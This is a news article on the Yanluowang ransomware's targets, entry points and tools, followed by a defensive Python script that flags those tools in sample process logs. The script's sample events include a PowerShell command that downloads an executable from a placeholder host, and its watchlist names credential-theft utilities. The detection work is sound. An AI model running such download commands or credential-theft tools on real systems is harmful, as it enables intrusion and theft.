
The New Yanluowang Ransomware Gang is Targeting US Businesses

Yanluowang, the ransomware recently discovered by Symantec, is now being used by threat actors.
Symantec recently identified a new ransomware strain known as Yanluowang in targeted operations against US companies. 

In October the Symantec Threat Hunter team found a "new arrival to the targeted ransomware scene" that appeared to still be under development. However, according to a blog post published on Wednesday, 1 December 2021, the variant dates back to at least August of this year. According to Symantec, the operators behind Yanluowang mostly targeted financial firms, although businesses in the manufacturing, IT services, consulting, and engineering industries have also been attacked.

According to Vikram Thakur, technical director at Symantec, the threat is more opportunistic than carefully targeted ransomware attacks. The majority of cases Thakur has encountered involved unpatched Microsoft Exchange servers or Internet Information Services (IIS) servers.

Symantec detected multiple indicators of compromise, including the use of publicly available tools such as AdFind, used to locate the victim's Active Directory server, and SoftPerfect Network Scanner, which finds hostnames and network services. Yanluowang threat actors frequently employ BazarLoader, a piece of malware typically used in the early stages of ransomware attacks.

"Once attackers get onto the computer, they take the installer for ConnectWise type applications and then double click on it and then they install it," Thakur said. 

"If I was to take a look at the last 100 ransomware connected investigations over the last couple of months, attackers have always installed it on the computer rather than relying upon something that's already there." 

In most cases, according to the blog post, "PowerShell was used to download tools to compromised systems." 

"After gaining initial access, the attackers usually deploy ConnectWise (formerly known as ScreenConnect), a legitimate remote access tool."  

The later attack phases observed by Symantec feature credential theft using a variety of credential-stealing programs, including GrabChrome, which collects credentials from Chrome. Open-source tools such as KeeThief, described by Symantec as a "PowerShell script to copy the master key from KeePass", have also been used.

While investigating the new ransomware outbreak, Symantec Threat Intelligence discovered certain tactics, techniques, and procedures (TTPs) that are similar to those of Thieflock, a well-known ransomware-as-a-service "developed by the Canthroid".

One such link was the use of "custom password recovery tools such as GrabFF and other open-source password dumping tools."

To counter the Yanluowang threat, Thakur proposes that businesses audit the computers on their network and hunt for unapproved software.

"The simplest solution is when patches are released for the applications on your machines, test them, deploy them as quickly as possible, because attackers are going to exploit them in just a matter of days after," he added.
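As an added illustration of the "hunt for unapproved software" advice (example code written for this post, not Symantec's or Thakur's own tooling), the script below triages process-creation events for the tools named above: AdFind, SoftPerfect Network Scanner (netscan), ConnectWise/ScreenConnect installed where it is not approved, the credential-theft utilities, and PowerShell download cradles. The event lines, host names, users and the approved-host list are all constructed for the example.

```python
import re

# Constructed process-creation events, shaped like what a Sysmon Event ID 1
# forwarder or an EDR agent would deliver to a SIEM. Hosts and users are made up.
SAMPLE_EVENTS = [
    {"host": "fin-ws07", "user": r"CORP\jdoe", "image": r"C:\Tools\AdFind.exe",
     "cmdline": 'AdFind.exe -f "(objectcategory=computer)" name'},
    {"host": "fin-ws07", "user": r"CORP\jdoe", "image": r"C:\Users\jdoe\Downloads\netscan.exe",
     "cmdline": "netscan.exe /hide /auto:out.xml"},
    {"host": "fin-ws07", "user": r"CORP\jdoe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://placeholder.invalid/t.exe','t.exe')\""},
    {"host": "fin-ws07", "user": r"CORP\jdoe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\jdoe\Downloads\ScreenConnect.ClientSetup.msi /quiet"},
    {"host": "it-ws02", "user": r"CORP\helpdesk",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n"},
]

# Tooling the article associates with Yanluowang intrusions, matched on the image
# basename or the command line (case-insensitive).
WATCHLIST = {
    "adfind": "AD enumeration (AdFind)",
    "netscan": "SoftPerfect Network Scanner",
    "screenconnect": "ConnectWise/ScreenConnect remote access",
    "connectwise": "ConnectWise/ScreenConnect remote access",
    "keethief": "KeePass master key theft (KeeThief)",
    "grabchrome": "Chrome credential theft (GrabChrome)",
    "grabff": "Firefox credential theft (GrabFF)",
}
# Hosts where the remote access tool is sanctioned; elsewhere it is "unapproved software".
APPROVED_REMOTE_ACCESS_HOSTS = {"it-ws02"}
# "PowerShell was used to download tools": flag common download cradles.
DOWNLOAD_CRADLE = re.compile(r"powershell.*?(downloadstring|downloadfile|invoke-webrequest|\biwr\b)", re.I)

def triage(events):
    """Return one (host, user, reason) finding per suspicious event, in event order."""
    findings = []
    for ev in events:
        text = (ev["image"] + " " + ev["cmdline"]).lower()
        for needle, label in WATCHLIST.items():
            if needle in text:
                if "remote access" in label and ev["host"] in APPROVED_REMOTE_ACCESS_HOSTS:
                    break  # sanctioned deployment, not a finding
                findings.append((ev["host"], ev["user"], label))
                break
        if DOWNLOAD_CRADLE.search(text):
            findings.append((ev["host"], ev["user"], "PowerShell download cradle"))
    return findings

if __name__ == "__main__":
    for host, user, reason in triage(SAMPLE_EVENTS):
        print(f"{host:10} {user:15} {reason}")
```

Running it on the constructed events yields four findings, all on fin-ws07; the Word launch on the approved IT workstation is not flagged.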